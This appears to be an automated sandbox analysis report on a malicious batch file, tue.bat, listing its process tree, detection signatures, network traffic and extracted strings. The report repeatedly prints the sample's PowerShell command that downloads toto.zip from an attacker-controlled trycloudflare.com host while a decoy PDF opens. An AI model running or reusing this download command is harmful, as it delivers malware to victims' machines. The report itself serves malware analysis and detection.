Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tue.bat

Overview

General Information

Sample name:tue.bat
Analysis ID:1542331
MD5:9b51dbe0e5610151149f3ded017ed974
SHA1:3c4c8728103f0d8f30bec2d8ae9c495c86accf0c
SHA256:86982da5c0cf03e1ca44f13dc50aa1f9a76743324a77719e14a33be5c119c47e
Tags:AgidCertbatSPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Suspicious powershell command line found
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 7112 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tue.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Acrobat.exe (PID: 4300 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LHEPQPGEWF.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 7316 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 7600 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1716,i,430510198886820409,3789369524464205952,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • timeout.exe (PID: 4692 cmdline: timeout /t 5 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • conhost.exe (PID: 5108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8088 cmdline: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 896 cmdline: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tue.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7112, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", ProcessId: 8088, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tue.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7112, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", ProcessId: 8088, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tue.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7112, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", ProcessId: 8088, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
Source: Binary string: n.pdb%]3 source: powershell.exe, 0000000F.00000002.1554307719.000001B7CBD7F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.1424696724.0000017A96F3A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1554307719.000001B7CBD7F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 0000000F.00000002.1556543840.000001B7CBFD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.1554307719.000001B7CBD7F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbs source: powershell.exe, 00000009.00000002.1465793067.0000017AB0F5D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.1465793067.0000017AB0F5D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbat source: powershell.exe, 00000009.00000002.1465116825.0000017AB0EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1556543840.000001B7CBFA3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000009.00000002.1465793067.0000017AB0F5D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb.cat source: powershell.exe, 00000009.00000002.1465116825.0000017AB0EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.1554307719.000001B7CBCC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb;N source: powershell.exe, 0000000F.00000002.1554307719.000001B7CBD7F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbvice source: powershell.exe, 0000000F.00000002.1556543840.000001B7CBFD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dows\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.1424696724.0000017A96F3A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1466952068.0000017AB120D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1554307719.000001B7CBCC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000009.00000002.1465116825.0000017AB0EA5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1554307719.000001B7CBD1F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000009.00000002.1466132369.0000017AB0F85000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000F.00000002.1556543840.000001B7CBFF6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1554307719.000001B7CBCC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.1556543840.000001B7CC002000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbllf source: powershell.exe, 0000000F.00000002.1556543840.000001B7CBFA3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000009.00000002.1465116825.0000017AB0EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.1466772787.0000017AB11DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1556543840.000001B7CBFA3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbXH source: powershell.exe, 0000000F.00000002.1554307719.000001B7CBD7F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb4e089^ source: powershell.exe, 00000009.00000002.1465116825.0000017AB0EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Joe Sandbox ViewIP Address: 96.7.168.138 96.7.168.138
Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: unknownTCP traffic detected without corresponding DNS query: 96.7.168.138
Source: unknownTCP traffic detected without corresponding DNS query: 96.7.168.138
Source: unknownTCP traffic detected without corresponding DNS query: 96.7.168.138
Source: unknownTCP traffic detected without corresponding DNS query: 96.7.168.138
Source: unknownTCP traffic detected without corresponding DNS query: 96.7.168.138
Source: unknownTCP traffic detected without corresponding DNS query: 96.7.168.138
Source: unknownTCP traffic detected without corresponding DNS query: 96.7.168.138
Source: unknownTCP traffic detected without corresponding DNS query: 96.7.168.138
Source: unknownTCP traffic detected without corresponding DNS query: 96.7.168.138
Source: unknownTCP traffic detected without corresponding DNS query: 96.7.168.138
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global trafficDNS traffic detected: DNS query: michael-scanned-motherboard-reforms.trycloudflare.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: powershell.exe, 0000000F.00000002.1556543840.000001B7CBFD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
Source: powershell.exe, 00000009.00000002.1460970201.0000017AA905A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1460970201.0000017AA8F17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1426512813.0000017A9A79B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1489704119.000001B7B5596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1547034981.000001B7C3D69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1547034981.000001B7C3C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000F.00000002.1489704119.000001B7B544B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000009.00000002.1426512813.0000017A98EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1489704119.000001B7B3BB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.1426512813.0000017A9A4B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1489704119.000001B7B51A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000F.00000002.1489704119.000001B7B544B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 2D85F72862B55C4EADD9E66E06947F3D0.6.drString found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000009.00000002.1426512813.0000017A98EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1489704119.000001B7B3BB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000F.00000002.1547034981.000001B7C3C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000F.00000002.1547034981.000001B7C3C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000F.00000002.1547034981.000001B7C3C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000F.00000002.1489704119.000001B7B544B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.1426512813.0000017A99AD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1489704119.000001B7B47E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 0000000F.00000002.1554307719.000001B7CBD1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000009.00000002.1425548377.0000017A97214000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1489105074.000001B7B1E64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://michael-scanned-motherboard-reforms.trycloud
Source: powershell.exe, 00000009.00000002.1426512813.0000017A99AD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1489704119.000001B7B47E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://michael-scanned-motherboard-reforms.trycloudflare.com
Source: powershell.exe, 00000009.00000002.1465116825.0000017AB0EF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://michael-scanned-motherboard-reforms.trycloudflare.com/
Source: powershell.exe, 0000000F.00000002.1554307719.000001B7CBD7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://michael-scanned-motherboard-reforms.trycloudflare.com/34e089
Source: powershell.exe, 0000000F.00000002.1488145955.000001B7B1C30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1556543840.000001B7CBFF6000.00000004.00000020.00020000.00000000.sdmp, tue.batString found in binary or memory: https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip
Source: powershell.exe, 0000000F.00000002.1556543840.000001B7CBFA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip7u
Source: powershell.exe, 0000000F.00000002.1489260870.000001B7B3650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip=
Source: powershell.exe, 00000009.00000002.1465793067.0000017AB0F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zipV
Source: powershell.exe, 00000009.00000002.1424696724.0000017A96F3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zipaA
Source: powershell.exe, 0000000F.00000002.1488145955.000001B7B1C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zipr
Source: powershell.exe, 00000009.00000002.1425903186.0000017A98920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zipy
Source: powershell.exe, 0000000F.00000002.1488145955.000001B7B1C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip~
Source: tue.batString found in binary or memory: https://michael-scanned-motherboard-reforms.trycloudflare.com/update.bat
Source: powershell.exe, 00000009.00000002.1460970201.0000017AA905A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1460970201.0000017AA8F17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1426512813.0000017A9A79B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1489704119.000001B7B5596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1547034981.000001B7C3D69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1547034981.000001B7C3C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000009.00000002.1426512813.0000017A9A4B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1489704119.000001B7B51A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000009.00000002.1426512813.0000017A9A4B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1489704119.000001B7B51A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: ReaderMessages.4.drString found in binary or memory: https://www.adobe.co
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: classification engineClassification label: mal48.winBAT@25/51@3/1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1412:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5108:120:WilError_03
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-10-25 13-47-15-303.logJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tue.bat" "
Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tue.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LHEPQPGEWF.pdf"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1716,i,430510198886820409,3789369524464205952,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"
Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LHEPQPGEWF.pdf"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1716,i,430510198886820409,3789369524464205952,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
